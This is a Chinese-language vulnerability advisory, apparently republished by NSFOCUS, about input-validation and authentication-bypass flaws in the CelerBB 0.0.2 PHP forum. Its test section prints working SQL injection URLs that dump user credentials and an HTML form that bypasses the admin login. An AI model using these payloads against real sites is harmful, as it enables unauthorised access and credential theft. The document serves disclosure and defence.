安全研究

安全漏洞
CelerBB多个输入验证和绕过认证漏洞

发布日期:2009-02-05
更新日期:2009-03-10

受影响系统:
CelerBB CelerBB 0.0.2
描述:
BUGTRAQ  ID: 34014
CVE(CAN) ID: CVE-2009-0851,CVE-2009-0852,CVE-2009-0853

CelerBB是使用PHP编写的开源论坛程序。

在禁用magic_quotes_gpc的时候,远程攻击者可以通过向CelerBB的login.php模块提交特制的Username参数请求绕过认证获得管理访问。

远程攻击者可以通过向CelerBB的showme.php模块提交特制的user参数请求读取敏感信息。

在禁用magic_quotes_gpc的时候,远程攻击者可以通过向CelerBB的viewforum.php和viewtopic.php模块提交恶意的id参数请求执行SQL注入攻击。

<*来源:Salvatore Fresta (drosophilaxxx@gmail.com
  
  链接:http://www.milw0rm.com/exploits/8161
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
http://www.site.com/path/showme.php?user=admin

<html>
  <head>
    <title>CelerBB 0.0.2 Authentication Bypass Exploit</title>
  </head>
  <body>
    <form action="login.php" method="POST">
      <input type="hidden" name="Username" value="admin'#">
      <input type="submit" value="Exploit">
    </form>
  </body>
</html>

建议:
厂商补丁:

CelerBB
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://celerbb.sourceforge.net/

浏览次数:2350
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障